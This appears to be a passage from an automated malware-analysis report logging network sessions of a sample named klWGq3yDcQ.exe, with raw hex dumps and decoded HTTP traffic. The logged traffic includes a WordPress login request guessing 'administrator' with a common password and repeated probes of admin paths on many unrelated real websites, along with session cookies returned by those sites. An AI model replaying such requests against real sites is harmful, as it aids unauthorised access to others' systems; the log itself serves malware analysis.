                                                                                                                                                                                                    2023-11-26 05:59:47 UTC162OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 57 65 6c 63 6f 6d 65 32 30 31 36 25 32 34 26 77 70 73 65 63 5f 63 61 70 74 63 68 61 5f 61 6e 73 77 65 72 3d 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=administrator&pwd=Welcome2016%24&wpsec_captcha_answer=&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fengel-firm.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC232INData Raw: 48 54 54 50 2f 31 2e 31 20 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 72 65 74 72 79 2d 61 66 74 65 72 3a 20 30 0d 0a 78 2d 62 61 63 6b 65 6e 64 3a 20 76 61 72 6e 69 73 68 5f 73 73 6c 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 429 Too Many RequestsServer: openrestyDate: Sun, 26 Nov 2023 05:59:48 GMTContent-Length: 0Connection: closeretry-after: 0x-backend: varnish_sslStrict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    514192.168.2.453272185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC176OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC305INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 37 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:57 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    515192.168.2.453147199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC185OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 37 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69 74 65 2d 78 73 72 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: no-cache, privateDate: Sun, 26 Nov 2023 05:59:57 GMTSet-Cookie: publishedsite-xsrf
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC607INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 6c 69 61 45 38 31 4b 7a 42 30 57 6c 6b 79 56 45 35 75 54 6a 6c 58 63 44 56 6b 53 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 58 70 6c 4d 31 64 77 61 46 5a 7a 53 6e 42 31 65 48 67 32 4d 55 56 69 59 6b 4e 78 56 48 4a 70 63 6a 42 54 51 55 68 4e 57 55 4a 33 56 6d 31 68 61 33 4e 72 64 55 70 45 55 54 42 71 4c 7a 4e 5a 52 6a 52 4d 4d 47 30 76 4e 47 56 43 53 48 56 52 5a 44 56 5a 63 32 74 43 5a 57 31 48 54 44 6c 32 56 55 52 45 64 30 68 55 51 55 5a 49 4f 55 31 77 53 56 5a 35 61 47 30 78 61 32 6c 4c 56 45 78 6d 5a 45 49 78 54 45 45 34 53 45 6b 31 64 55 68 78 54 7a 4a 45 54 54 56 4e 64 46 42 53 62 7a 5a 78 61 6e 67 78 63 58
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6IkliaE81KzB0WlkyVE5uTjlXcDVkS3c9PSIsInZhbHVlIjoicXplM1dwaFZzSnB1eHg2MUViYkNxVHJpcjBTQUhNWUJ3Vm1ha3NrdUpEUTBqLzNZRjRMMG0vNGVCSHVRZDVZc2tCZW1HTDl2VUREd0hUQUZIOU1wSVZ5aG0xa2lLVExmZEIxTEE4SEk1dUhxTzJETTVNdFBSbzZxangxcX
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC1580INData Raw: 36 32 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 20 41 72 69 61 6c 2c 20 73 61
                                                                                                                                                                                                    Data Ascii: 620<!doctype html><html><head> <title>404 - Page Not Found</title> <style type="text/css"> html, body { height: 100%; margin: 0; padding: 0; font-family: Roboto, Helvetica Neue, Arial, sa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    516192.168.2.45329095.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC295OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=dbce043fd5773e46115905cf1a6992b8|11f187638643e13d7bd1963991fac52b; OF=68racb9qa4tcicisten4cggps0
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    517192.168.2.45330854.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC174OUTGET /admin/pages/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC511INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 61 66 75 62 74 32 36 38 73 6d 6f 33 6a 36 30 34 64 66 6e 6c 6b 32 74 71 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 53 65 63 75 72 69 74 79 2f 6c 6f 67 69 6e 3f 42 61 63 6b 55 52 4c 3d 25 32 46 61 64 6d 69 6e 25 32 46 70 61 67 65 73 25 32 46 0d 0a 78 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3a 20 53 69 6c 76 65 72 53 74 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:57 GMTServer: Apache/2.4.52 (Ubuntu)Set-Cookie: PHPSESSID=afubt268smo3j604dfnlk2tqck; path=/; HttpOnlylocation: https://ce-logic.com/Security/login?BackURL=%2Fadmin%2Fpages%2Fx-controller: SilverStr


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    518192.168.2.45316715.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:57 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    519192.168.2.45545454.83.33.36443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:57 UTC250OUTGET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=afubt268smo3j604dfnlk2tqck
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC333INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 78 2d 72 6f 62 6f 74 73 2d 74 61 67 3a 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:58 GMTServer: Apache/2.4.52 (Ubuntu)x-frame-options: SAMEORIGINx-robots-tag: noindex, nofollowvary: X-Forwarded-Protocol,Accept-Encodingcache-control: no-cache, no-store, must-revalidateConnection:
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC7859INData Raw: 32 61 64 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 6f
                                                                                                                                                                                                    Data Ascii: 2ad4<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Lo
